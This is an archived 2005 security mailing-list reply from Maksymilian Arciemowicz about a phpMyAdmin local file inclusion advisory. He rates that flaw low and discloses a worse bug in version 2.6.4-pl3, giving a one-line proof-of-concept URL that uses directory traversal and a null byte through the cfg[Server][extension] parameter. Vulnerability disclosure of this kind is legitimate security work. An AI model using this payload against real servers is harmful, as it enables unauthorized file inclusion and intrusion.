| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <200510232000.37855.max@jestsuper.pl> Date: Sun Oct 23 19:15:41 2005 From: max at jestsuper.pl (Maksymilian Arciemowicz) Subject: Re: Advisory 16/2005: phpMyAdmin Local File Inclusion Vulnerability (Stefan Esser) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 It is low local file inclusion. No critical. Standart have you $cfg['ThemePath']. More critical bug still exists in phpmyadmin. phpMyAdmin-2.6.4-pl3/libraries/database_interface.lib.php?cfg[Server] [extension]=../../mGPC_muss_be_off_%00 org. adv. http://securityreason.com/achievement_securityalert/1 Maksymilian Arciemowicz max@...tsuper.pl SecurityReason.Com -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (FreeBSD) iD8DBQFDW8673Ke13X/fTO4RAsbzAKCv8tkGfD5dAbliWlaLMkfLkYnVfgCgs9RE HllDGmvD6iOQiSeH9Sk4WCQ= =9U2v -----END PGP SIGNATURE-----
Powered by blists - more mailing lists